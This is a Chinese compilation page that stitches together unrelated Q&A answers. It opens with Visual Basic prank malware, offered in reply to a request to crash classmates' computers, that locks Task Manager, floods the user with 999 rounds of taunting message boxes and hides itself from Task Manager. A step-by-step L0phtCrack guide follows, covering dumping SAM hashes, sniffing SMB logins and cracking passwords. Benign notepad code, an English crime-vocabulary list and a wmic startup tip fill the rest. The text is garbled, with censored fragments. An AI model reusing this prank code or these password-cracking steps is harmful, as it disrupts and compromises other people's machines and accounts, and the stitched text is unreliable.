本文目录一览:
给个黑客程序(业余的,只要别人电脑蓝屏死机)黑一搓同学,不要专业
Open Environ$("WinDir") "\system32\taskmgr.exe" For Binary As #1
For m = 1 To 999
MsgBox "呵呵,你知道我是谁吗?", 16
MsgBox "什么??不知道?", 16
MsgBox "那你打开 *** 什么?", 16
MsgBox "你有空没事做吧?!", 16
MsgBox "我..就是鼎鼎大名的*********", 16
MsgBox "*********..", 16
MsgBox "现在你把它打开了觉得后悔了吧?呵呵..", 16
MsgBox "算了算了,不玩你了", 16
MsgBox "现在我数3声就闪人,行了吧?", 16
MsgBox "1.............", 16
MsgBox "2.............", 16
MsgBox "3.............", 16
MsgBox "噔噔噔噔,我又回来了!", 16
MsgBox "哈哈,是不是很过瘾呢?", 16
MsgBox "现在我先介绍下自己..", 16
MsgBox "我叫奥特曼..", 16
MsgBox "性别:男..", 16
MsgBox "今年17岁..", 16
MsgBox "不好意思噢,我好像说多了..", 16
MsgBox "不要这样喇,听我说完先好不?", 16
MsgBox "来来来,开始喇..", 16
MsgBox "我叫王得地..", 16
MsgBox "家中有屋又有田..", 16
MsgBox "生活乐无边..", 16
MsgBox "好像我又说多了...", 16
MsgBox "不要生气嘛,你认真看下去我就放你走..", 16
MsgBox "好,开始喇..", 16
MsgBox "从前有座山..", 16
MsgBox "山里有个座庙..", 16
MsgBox "庙里有个和尚..", 16
MsgBox "哈哈,想哭吗?", 16
MsgBox "被骗的感觉不爽吧?", 16
MsgBox "喂喂喂!别别..千万别重启电脑", 16
MsgBox "我告诉你怎么关吧", 16
MsgBox "先打开任务管理器", 16
MsgBox "忘了告诉你了,任务管理器打不开了", 16
MsgBox "别恨我啊你不小心", 16
MsgBox "电脑重新启动吧", 16
MsgBox "相信我吧,你知道我是不会骗人的", 16
MsgBox "如果你还想继续点的话,你就别听我的", 16
MsgBox "呵呵,我又没有说这个东西没有", 16
MsgBox "我只想说桌面没有罢了..", 16
MsgBox "嘻嘻,爽不爽吖?", 16
MsgBox "对着电脑屏幕大声说低调大好人", 16
MsgBox "不然,我就没办法的咯", 16
MsgBox "因为我把循环设置成99了", 16
MsgBox "想保存电脑数据只有继续点了", 16
MsgBox "绝对会出到去的", 16
MsgBox "好了,废话不多说了,祝你好运..", 16
MsgBox " *** :莫忻", 16
MsgBox " *** :*********", 16
MsgBox "E-mail:不告诉你", 16
MsgBox "好,继续循环..", 16
Next
0000000000000000000000000000000000000000000000000000000000000
Form1.KeyPreview = True
If KeyCode = 37 Then
Picture1.Left = Picture1.Left - 45
ElseIf KeyCode = 38 Then
Picture1.Top = Picture1.Top - 30
ElseIf KeyCode = 39 Then
Picture1.Left = Picture1.Left + 15
ElseIf KeyCode = 40 Then
Picture1.Top = Picture1.Top + 70
End If
方向键控制物体运动 00000000000000000000000000000000000000000000
If a = fasle Then
Command1.Top = Command1.Top + 20
If Command1.Top 2400 Then
a = True
End If
End If
If a = True Then
Command1.Top = Command1.Top - 20
End If
If Command1.Top 140 Then
a = False
End If
控件自动上下移动0000000000000000000000000000000000
Label1.Caption = ""
Label1.Left = X - 20
Label1.Top = Y - 20
Label1.Caption = "当前鼠标坐标: x=" X " y = " Y
鼠标坐标轴代码00000000000000000000000000000000000000000
app.taskervisible=false
在任务管理器隐身
程序更好尽量简单,我的界面就两个文本框,两个按钮。
保存按钮的代码我是这样写的:
Private Sub Command1_Click()
Open "f:\文件保存\data.txt" For Output As #1 '文件保存的路径
print #1, text1.text
Close #1
End Sub
提取的代码我不会写。。
要分行写入不同的文本框。。
应该怎么写呢?
越简单越好。。更好加上注释。。我希望下一次我自己能做出来
Private Sub Command2_Click()
Open "f:\文件保存\data.txt" For Input As #1 '文件保存的路径
Line Input #1, x
Text1.Text = x
Close #1
End Sub
00000000000000000000000000000000000000000000000vb 保存数据到txt
Private Sub Command2_Click()
Open "F:\TEST\b.txt" For Output As #1
Print #1, Text1.Text
Close
End Sub
以上代码可以创建一个txt文件并写入数据
L0phtcrack5.0如何使用
该产品的试用期为15天,在此之后,如果需要继续使用该软件,必须先注册。你可以通过 *** , *** ,或传真的方式向厂商免费申请一个注册号,完成注册的过程。每一台安装L0phtCrack的机器都必须有唯一的产品注册号。如果需要在另一台机器或是另一个操作系统上安装一个L0phtCrack,就必须再申请一个注册号。但如果你以前使用的L0phtCrack2.0,并已进行过注册,该注册号在L0phtCrack2.5中同样适用。 使用L0phtCrack自带的hash列表进行快速入门的过程。通过使用File Open Password File命令打开pwfile.txt文件。选择Tools Run Crack命令,口令破解过程就开始了。这就是一个简单的破解过程。 L0phtCrack能直接从注册表,文件系统,备份磁盘,或是在 *** 传输的过程中找到口令。L0phtCrack开始破解的之一步是精简操作系统存储加密口令的hash列表。之后才开始口令的破解,这个过程称为是cracking。它采用三种不同的 *** 来实现。 (1)、最快也是最简单的 *** 是字典攻击。L0phtCrack将字典中的词逐个与和口令hash表中的词作比较。当发现匹配的词时,显示结果,即用户口令。L0phtCrack自带一个小型词库。如果需要其它字典资源可以从互联网上获得。这种破解的 *** ,使用的字典的容量越大,破解的结果越好。 (2)、另一种 *** 名为hybrid。它是建立在字典破解的基础上的。现在许多用户选择口令不再单单只是由字母组成的,他们常会使用诸如”bogus11”或”Annaliza!!”等添加了符号和数字的字符串作为口令。这类口令是复杂了一些,但通过口令过滤器和一些 *** ,破解它也不是很困难,Hybrid就能快速地对这类口令进行破解。 (3)、最后一种也是最有效的一种破解方式”暴力破解”。按道理说真正复杂的口令,用现在的硬件设备是无法破解的。但现在所谓复杂的口令一般都能被破解。只是时间长短的问题;且破解口令时间远远小于管理员设置的口令有效期。使用这种 *** 也能了解一个口令的安全使用期限。 二、怎样得到口令的hash列表 开始破解过程,L0phtCrack首先需要检索口令hash列表。如果你有管理权限,你可以使用Tools Dump Passwords from Registry命令在L0phtCrack菜单上检索hash表。你可以从本地机上或是允许访问的远程机倒出口令hash列表。在注册表对话框中的Dump Passwords输入NT机器名,或IP地址,点击OK。用户名和密码下载到L0phtCrack中。对口令列表的检索结束之后,开始执行口令过程。 第二种是通过文件系统访问hash列表。因为操作系统对SAM文件进行了加密,口令存储在该文件系统中。当操作系统在运行过程中,是不可能从文件系统中得到任何信息的。有时候,文件系统的备份被保存在磁盘或一个加密的repaire磁盘上或是在系统硬件的repair目录上。同时,其它的操作系统(如DOS系统)可以从软盘启动,口令hash能直接从文件系统得到。如果你能对计算机进行物理访问,这种 *** 很有用。 你可以从”SAM”或”SAM.-“文件中下载hash列表到L0phtCrack。通过使用FileImport SAM File菜单命令和指定的文件名。L0phtCrack将自动在NT上展开”SAM”文件。 (注意:如果你使用的是Win95/98,展开”SAM.-“文件到”SAM”,使用在NT系统的扩展指令。该命令是expand sam.- sam.) L0phtCrack提供的最后一种获得hash列表的 *** 是通过 *** 。你的机器一定有一个或多个以太网设备对 *** 进行访问。使用Tool *** B Packet Capture命令启动 *** B包捕获窗口。 *** 设备能获得任何 *** B认可的部分。如果你转换 *** ,你就只能看到本机或连接的机器原有的任务。 当 *** B认可的任务授权被捕获的时,在 *** B Packet Capture的窗口显示。内容有:源代码,目的IP地址,用户名, *** B口令,加密LAMMAN hash列表和加密NTLM hash列表等等。Save Capture命令保存捕获到的信息,用来破解hash表。File Open Password命令打开捕获的内容。同时,你还可以对其它的口令进行捕获和破解。 Todd Sabin 已经发布了一个免费的工具,能在本地导出口令的hash列表,如果SAM使用的是SYNKEY工具进行加密(该资源在Service Packet3中有介绍,可从 中得到。),根据网站上的指导可以对口令的hash表进行检索。你可以使用File Open Password File命令下载hash列表到L0phtCrack中。 三、如何破解口令hash列表 L0phtCrack的之一种 *** 是使用字典攻击。该 *** 通过使用字典中的词库进行破解工作。将词库中的所有的口令与口令hash列表作比较。如果得到了匹配的词,则破解成功。L0phtCrack自带了一个有25000个词的名为words-english的文件,其中包括了许多常见的作为口令的词。也可用File Open Qordlish 文件菜单命令可以下载其它的字典到L0phtCrack。 开始破解的过程:选择菜单上的Tools Run Crack。默认的顺序是字典攻击,hybrid 攻击,暴力破解。通常在使用了这三种 *** 之后,L0phtCrack大都能成功的获得口令。如果你愿意也可以在Tools Option对话框中定义破解攻击的具体步骤。 L0phtCrack窗口显示的状态信息表明,字典攻击成功的概率和字典中词库的大小成正比例。 在字典攻击失败后,开始hybrid攻击。Hrbrid使用简单的模式,用户通过对一般词汇的改变产生的口令进行攻击。L0phtCrack能智能化地尝试口令的猜测。比如试一试”BOGUS11”。许多的用户仅仅在一些原有词的基础上添加了很少的数字或符号,来试图创造一个不可猜测的口令。但L0phtCrack能很快猜测出这些口令,而不再需要进行暴力攻击。L0phtCrack的Hybrid的破解 *** ,使用的默认检验字符或数字的个数是2。也可以通过Tools Options命令来改变该数值。 在字典攻击和hybrid攻击失败之后,就是暴力攻击。它可能会消耗相当长的时间,但是这些时间远远小于口令的有效期。因此这些口令在暴力攻击面前显得格外的脆弱。可以通过使用”Tool Option”命令改变字符数字的设置。默认的设置是尝试所有的数字和字符。 在Pentium II/450 到Pentium 166的CPU上理想的暴力破解时间是应该是24-72小时。 四、口令使用指南: Open Password File 该命令打开hash列表文件。该文件是以L0phtCrack2.5格式(*.lc)或是以PWDUMP的形式创建的。 Open Wordlist File 该命令打开字典攻击中的词库。L0phtCrack2.5自带的默认目录文件是名为word-english的文件。如果没有自定意的字典就使用它了。 Import SAM file 该命令打开一个SAM文件并从它下载口令的hash列表。如果该文件有名为SAM.-的压缩文件,在NT系统,它将自动展开。如果运行在windows95、98操作系统下,你需要使用在NT系统下的扩展应用程序expand sam._sam,展开SAM._到SAM。 Save "amp; Save As Save "amp; Save As命令保存口令破解的当前状态,不论它们是否已经受到攻击。文件以L0phtCrack2.5格式(*.lc)保存。这是一个ASCII码文件,能在各种编辑器中编辑,保存在各类数据库中。该文件可在解码中断时重新载入,从断点继续开始解码,或在一次解码过程中使用不同的解码方式。 Exit Exit结束破解进程。 Edit Edit菜单是没有多大用处。
黑客动画吧记事本源代码
VB.net编程 *** :
'新建文件
Private Sub mnuNew_Click()
RichTextBox1.Text = "" '清空文本框
FileName = "未命名"
Me.Caption = FileName
End Sub
'打开文件
Private Sub mnuOpen_Click()
CommonDialog1.Filter="文本文档(*.txt) *.txt RTF文档(*.rtf) *.rtf 所有文件(*.*) *.*"
CommonDialog1.ShowOpen
RichTextBox1.Text = "" '清空文本框
FileName = CommonDialog1.FileName
RichTextBox1.LoadFile FileName
Me.Caption = "超级记事本:" FileName
End Sub
'保存文件
Private Sub mnuSave_Click()
CommonDialog1.Filter="文本文档(*.txt) *.txt RTF文档(*.rtf) *.rtf 所有文件(*.*) *.*"
CommonDialog1.ShowSave
FileType = CommonDialog1.FileTitle
FiType = LCase(center(FileType, 3))
FileName = CommonDialog1.FileName
Select Case FiType
Case "txt"
RichTextBox1.SaveFile FileName, rtfText
Case "rtf"
RichTextBox1.SaveFile FileName, rtfRTF
Case "*.*"
RichTextBox1.SaveFile FileName
End Select
Me.Caption = "超级记事本:" FileName
End Sub
'退出
Private Sub mnuExit_Click()
End
End Sub
'复制
Private Sub mnuCopy_Click()
Clipboard.Clear
Clipboard.SetText RichTextBox1.SelText
End Sub
'剪切
Private Sub mnuCut_Click()
Clipboard.Clear
Clipboard.SetText RichTextBox1.SelText
RichTextBox1.SelText = ""
End Sub
'全选
Private Sub mnuSelectAll_Click()
RichTextBox1.SelStart = 0
RichTextBox1.SelLength = Len(RichTextBox1.Text)
End Sub
'粘贴
Private Sub mnuPaste_Click()
RichTextBox1.SelText = Clipboard.GetText
End Sub
'查找
Private Sub mnuFind_Click()
sFind = InputBox("请输入要查找的字、词:", "查找内容", sFind)
RichTextBox1.Find sFind
End Sub
'继续查找
Private Sub mnuFindOn_Click()
RichTextBox1.SelStart = RichTextBox1.SelStart+RichTextBox1.SelLength + 1
RichTextBox1.Find sFind, , Len(RichTextBox1)
End Sub
'使用说明
Private Sub mnuReadme_Click()
On Error GoTo handler
RichTextBox1.LoadFile "Readme.txt",rtfText'请写好Readme.txt文件并存入程序所在文件夹中
Me.Caption = "超级记事本:" "使用说明"
Exit Sub
handler:
MsgBox "使用说明文档可能已经被移除,请与作者联系。", vbOKOnly, " 错误信息"
End Sub
VC++编程 *** :
首先用VC++创建一个MFC AppWizard(exe)单文档工程,名字Notepad。在Advanced里面File extension(文件扩展名)里面写txt就是关联txt文件,在Base class里面要选CEditView类(意思是基于这个类派生出你用的类)
其实这样生成的就是一个记事本了,但是和原来的记事本还是有区别的
所以我们还要添加点功能,这样才能起到让新人了解VC++的目的
1、我们先加一个设置字体
在 CNotepadView类里面定义字体(就是public) CFont m_Font;
定义消息处理函数:
void CNotepadView::OnFormatFont()
{
// TODO: Add your command handler code here
LOGFONT lf;
CFont *font=this-GetEditCtrl().GetFont();
if(font==NULL)
{
font =new CFont;
font-CreatePointFont(120,"Fixedsys");
font-GetLogFont(lf);
delete font;
}
else
{
font-GetLogFont(lf);
}
CFontDialog cf(lf);
if(cf.DoModal()==IDOK)
{
this-m_Font.DeleteObject();
this-m_Font.CreateFontIndirect(lf);
this-SetFont(this-m_Font);
}
}
2、设置字体
在 CNotepadView类里面定义 BOOL bChk;
消息处理函数
void CNotepadView::OnFormatReturn()
{
// TODO: Add your command handler code here
bChk=!bChk;
if(!bChk)
{
ShowScrollBar(SB_HORZ,true);
}
else
{
ShowScrollBar(SB_HORZ,false);
}
}
下面是源代码RAR压缩包
黑客动画吧记事本源代码不会轻易公开的,那个记事本也不太好,界面也不好,其实破解也很容易的,但是意义不大。
英语新闻词汇
201.accomplice : 同案犯
any person who takes part in a crime.
参与犯罪的每个人。
tony was found to be an accomplice in the crime.
人们发现托尼是该案的同案犯。
202. *** business district : 红灯区
a neighborhood zoned for *** ographic bookstores and movie theaters, striptease bars, etc.
划定的街区,作为开设色情书店、影院、脱衣舞场等的场所。
police are constantly arresting people over in the *** business district.
警察常在红灯区拘捕人犯。
203.agricrime : 农业犯罪
sort for agricultural crime. the theft of crops and /or farm equipment.
"agricultural crime"的缩写词,偷盗庄稼和/或农场设备的犯罪。
farmers are losing thousands of dollars each year due to agricrime.
每年农业犯罪给农场主造成了成千上万美元的损失。
204.armed robbery :武装抢劫
the act of using a deadly weapon when raking or attempting to take property form another person or party.
夺取或试图夺取他人或他方财物时使用致命武器的犯罪行为。
did you read about the armed robbery in this morning's paper?
今早的报纸上报道了这次武装抢劫,你读了吗?
205.arrest warrant : 逮捕证
a document that orders the arrest of an individual who has been accused with a crime.
对被指控犯罪的某人实施搜捕的文件。
the court issued an arrest warrant on the suspect.
法庭对这个嫌疑人发出了逮捕证。
206.arson : 纵火
the crime of intentionally destroying property by the use of fire.
故意放火毁坏财产的犯罪。
police think the fire that burned down the old warehouse was an act of arson.
警察怀疑这座仓库的大火是纵火行为所致。
207.assassin : 暗杀
a murderer. a person who sets out to kill someone, esp. a prominent person.
谋杀者。密谋杀害他人,特别是一位杰出人物的凶手。
police are still looking for the assassin of the president candidate.
警方仍在追查暗杀总统候选人的凶手。
208.assault : 袭击
the act of attempting or threatening to harm another person.
试图伤害或威胁要伤害他人的行为。
mr. green was assaulted while he was walking on 25th street.
格林先生在第25大街行走的时候受到袭击。
209.attack dog : 攻击犬
a canine dog that has been trained to attack burglars, etc.
一种经过训练的狼犬,用来攻击窃贼等。
the officer's attack dog has saved his life many times.
这位警察的攻击犬多次救了主人的命。
210.back-alley butcher : 卑鄙的屠夫
slang for abortionist.
俚语,给人施行流产手术的人。
demonstrators picked an abortion clinic with signs that said "back-alley" butcher.
*** 者将一家流产诊所用标语牌围起来,牌子上写着"卑鄙的屠夫".
59.surreali *** :超现实主义
a style using subconscious mental activity as its subject matter, characterized by dreamlike, hallucinatory imagery.
将下意识的精神活动作为描写对象,多运用梦幻意象的艺术形式。
the artist salvador dali is synonymous with surreali *** .
艺术家萨尔瓦多·达利是超现实主义的同义词。
211.bail : 保释金
money that is deposited with a court in order to secure the release of a defendant while awaiting trial.
存放在法庭的一定数量的保证金,以使被告在候审期间获得释放。
frank's wife came down to the police station to bail him out.
弗兰克的妻子到警察局将他保释出来。
212.ballistics : 弹道学
the science of firearms and the study of the motion of bullets.
研究火器及子弹运动的科学。
a ballistics expert was taking evidence at the scene of the crime.
一位弹道学家正在犯罪现场提取证据。
213.blackmail : 敲诈,勒索
the act of threatening to reveal personal information, esp. ***ual scandals, in order to extract money.
以揭露隐私特别是性丑闻为威胁手段以谋取钱财的行为。
linda was involved in a blackmail scandal of the mayor.
林达涉嫌敲诈市长的丑闻。
214.black market : 黑市
a market place where illegal or hard-to-get items are sold or where money is illegal exchanged.
非法或紧俏物资的销售点,或者非法换汇的地方。
gangs are buying assault weapons on the black market.
黑帮总在黑市购买攻击性武器。
215.blood money : 血腥钱
money that is paid as retribution for injury, loss of life, vandali *** , etc.
为他人受伤、丧命、损坏财产而付出的酬金。
the mafia paid blood money to have that man killed.
黑手党拿出血腥钱将那人杀了。
216.body bag : 装尸袋
a heavy-duty bag that is used to contain a corpse.
一种结实的用来装运尸体的袋子。
the officer warmed the man to drop his gun or "end up in a body bag."
警察警告那人放下武器,否则必死无疑。
217.bomb squad : 爆破小组
a team of police who are specially-trained to remove and deactivate bombs.
经专门训练,从事排除和拆卸炸弹的一支警察队伍。
the bomb squad was called in to deactivate the car bomb.
有关部门请来爆破小组拆除这枚汽车炸弹。
218.bootlegging : 贩卖违禁品
the illegal distribution of items such as alcohol, drugs, firearms, etc.
非法销售物品如酒类、毒品、枪支等。
three mexicans were arrested for bootlegging firearms across the border.
三名墨西哥人因越境贩卖枪支而被捕。
219.break-in : 非法闯入
a burglar
入室盗窃
it looks like you are the victim of a break-in.
看起来,你是入室盗窃的受害者。
220.bribery : 行贿受贿
the act of offering, giving, or taking bribes.
赠送,提供,或接受贿金的行为。
the congres *** an resigned after having been found guilty of bribery.
这位议员被证实犯有行贿受贿罪后辞职了。
221.bucket shop : 投机商号
(also called "telephone boiler room.") an office that is used to promote worthless land or securities by mail or through telemarketing.
(也被称为" *** 交易所")通过邮件或 *** 营销来推销荒地或垃圾证券的地点。
crooks across the country are using bucket shops to scam older people.
全国各地的骗子都利用投机商号来欺骗老年人。
222.bug : 窃听
to use electronic listening devices to listen in on the conversations of others.
使用电子收听装置来偷听他人的谈话。
this office has been bugged.
这间办公室已被窃听。
223.bum rap : 错捕
an unmerited arrest
不应实施的逮捕。
steve served six months jail time on a bum rap.
史迪夫因错捕而受了6个月的监禁。
224.burglary : 入室盗窃
the act of breaking into a home, building, etc. with the intent to steal from it.
闯入民宅、建筑物等,企图偷盗的行为。
burglaries in our town have been on the ung.
我们小城里的入室盗窃案一直在上升。
225.car bangers : 汽车窃贼
thieves who steal form automobiles.
从汽车里偷东西的贼。
police caught the car bangers in the act.
警方将这些汽车窃贼当场抓获。
226.career criminal : 职业罪犯
a person who makes a living from crime.
以犯罪为生的人。
john was a career criminal until the day he got caught in the home of a policeman.
约翰是位职业罪犯,直到一天他在一个警察家里被抓获。
227.child abuse : 虐待儿童
the physical and verbal mistreatment of children.
对儿童进行身体上和言语上的虐待。
the most unnerving thing about child abuse is the number of cases that go unreported.
有关虐待儿童方面最让人不安的事情是大量的此类行为没有报道。
228.chop shop : 地下拆车厂
a shop where criminals take apart stolen cars and sell the parts.
犯罪分子将所盗汽车拆成零件并销售出去的窝点。
i watched a news program that tracked chop shops across the country.
我收看了一个追踪全国地下拆车点的电视节目。
229. *** e : 可卡因
a powerful stimulant drug.
一种有强力兴奋作用的毒品。
what is the street value of a pound of *** e?
一磅可卡因市值多少?
230.computer cleaner : 消除财务信息的电脑黑客
a person who, for a price, clean computer files of unfavorable financial credit information of others.
将反映他人财物信用赤字的计算机文件抹去以获取报酬的人员。
computer cleaners cost companies and financial institutions million of dollars every year.
消除财务信息的电脑黑客每年给公司和金融机构造成百万元计的损失。
231.con artist : 行骗高手
a person who is skilled at convincing others of believing in fraudulent schemes.
擅于蒙骗并使人进入骗局的人。
bob makes his living as a con artist.
鲍勃是位行骗高手,并以行骗为生。
232.con game : 骟局
any fraudulent scheme
任何骗人的把戏。
my grandparents got burned in a con game.
我的祖父母曾上过骗子的当。
233.convict : 囚犯
a person found guilty of a felony and confined in a prison.
被判有重罪并羁于狱中的人。
mr. welch is an ex-convict.
韦尔奇先生从前是囚犯。
234.counterfeit : 伪造
to illegally reproduce a copy of money, postage stamps, bonds, etc.
非法印造钱币、邮票、证券等。
police busted up a counterfeiting racket in miami last week.
上周警方捣毁了迈阿密的一个伪造团伙。
235.credit-card fraud : 信用卡欺诈
the attempted use of a credit to obtain goods or services with the intention of avoiding payment.
企图使用信用卡获取货物或服务,并故意逃避付款。
that woman is wanted in 5 states for credit-card fraud.
那位妇女因信用卡欺诈而被5个州通缉。
236.crime of passion : *** 犯罪;冲动犯罪
murder that resulted form the infidelity of a lover; murder committed in the heat of rage.
由于情人的不忠而导致的谋杀;暴怒驱使的杀人行为。
crimes of passion seem to be popular material for tv infotainment programs.
冲动杀人似乎是娱乐性新闻节目受欢迎的题材。
237.crime rate : 犯罪率
the number of reported crimes per specified number of the population.
每一定人数中发生的犯罪数量。
which state has the highest crime rate in the u.s.?
在美国,哪个州的犯罪率更高?
238.criminal : 犯罪
a person who has violated a criminal law.
触犯刑法的人。
we are placing your son in criminal detention.
我们对你儿子实行刑事拘留。
239.date rape : 约会强*
a rape that is committed by a woman's date.
由女性的约会对象实施的强*.
date rape is the last thing that a young girl should have to worry about.
约会强*是年轻女子最不用害怕的事。
240.deadly weapon : 致命武器
any object, or instrument that is capable of being used to kill.
任何可以用以杀人致命的物体、器具。
it is against the law to carry a concealed deadly weapon.
秘密携带致命武器是违法的
241.death penalty :死刑
punishment by death, that is imposed in a legal manner.
以合法的形式剥夺罪犯生命的一种惩罚。
three men have received the death penalty so far this year.
今年已有三个被判死刑。
242.death row : 死囚牢房
a cell block reserved for convicts awaiting execution.
特别为等待处决的死刑犯设置的牢房。
this convicted killer has been on death row for 15 years.
这位被判决死刑的杀人犯住在死囚牢房已15年了。
243.defendant : 被告
a person who has been charged with a crime
被指控犯有罪行的人。
the court found the defendant guilty of murder.
法庭判定被告犯有谋杀罪。
244.domestic violence : 家庭暴力
violence toward a family member, including child abuse or wife beating.
对家庭成员施加的暴力,包括虐待儿童和殴打妻子。
domestic violence is one of the most dangerous calls that a law enforcement officer has to make.
家庭暴力是执法官最难应付的案件之一。
245.drug abuse : 吸毒
the excessive and compulsive use of drugs to the point of damaging one's health.
强迫性过量使用毒品,以致损害身体。
it was obvious to see by looking at the needle marks on her arms that the young girl was a victim of drug abuse.
从她臂上针扎的痕迹来看,很明显,这位年轻女子是吸毒的受害者。
246.drug king (czar) : 毒枭
the person who controls the production, transportation and selling of drug in an area.
控制某一地区的毒品地区生产、运输和销售的头号人物。
after two years of using an undercover operation, the fbi finally arrested the cuban drug king.
经过两年的秘密行动,联邦调查局终于逮捕了这位古巴毒枭。
247.drunk driving : 酒后驾驶
driving while under the influence of alcohol.
在受酒精影响的状态下开车。
this is your second drunk driving offense this month.
这是你本月第二触犯次酒后驾驶的禁令。
248.edp crimes : 电脑犯罪
electronic data-processing crime; criminal offenses committed using computer technology.
在电子数据处理方面的犯罪;利用电脑技术进行的犯罪。
the irs investigated hundreds of edp crimes every year.
美国国内收入局每年都要调查数以百计的电脑犯罪。
249.embezzlement : 贪污
the illegal misappropriation of funds entrusted to one\''s care.
将由自己保管的资金非法据为已有。
we have never had a problem with embezzlement at this bank.
我们这家银行从没发生过贪污案件。
250.first-degree murder : 一级谋杀案
premeditated murder.
事先策划好的谋杀。
the man was changed with first-degree murder in the death of his lover's hu *** and.
这位男子其情人的丈夫死亡案中被指控犯有一级谋杀罪
够多的了,我还可以上传.....
建议你去买几本字典...........
怎样防止黑客通过命令提示符攻击系统
查看WinXP启动信息有很多中 *** ,其中大家最熟悉的一种就是在运行中输入“msconfig.exe”命令调用“系统配置实用程序”来查看,也有不少朋友喜欢直接用第三方软件来查看,简洁明了。这些 *** 都是建立在系统正常的情况下,如果某一天系统中毒了导致无法运行“系统配置实用程序”或者软件,这时候还有第三种 *** 来帮助你,就是通过命令提示符来查看WinXP的启动信息。操作 *** :1.通过“开始”→“程序” →“附件” →“命令提示符”命令,进入命令提示符操作窗口。2.在命令提示符操作窗口中输入“wmic startup get caption,command”(不含双引号)这个命令。输入后,命令提示符操作窗口中就会列出本机随Windows自启动的程序信息。窗口中的“Caption”栏为自启动项目名称,“Command”栏为自启动程序的具体路径。如果我们需要把WinXP自启动信息输出到一个文本文件中以方便我们的查看或打印,我们还可以使用“wmic /output:d:Startup.txt startup get caption,command”命令(不含双引号)。输入后,在D盘中就会出现一个名为“startup.txt”的文本文件,打开它也可以查看到本机随Windows自启动的程序信息。此命令中的“d:startup.txt”为输出文本文件的路径和名称,可根据需要自行修改。通过命令提示符来查看WinXP启动信息的这种 *** ,查看到的信息也非常完整,完全不比用第三方软件来的差。小编也建议大家经常查看查看WinXP的启动信息,这样也能及时清理一些启动垃圾项,帮助你提高电脑开机运行速度。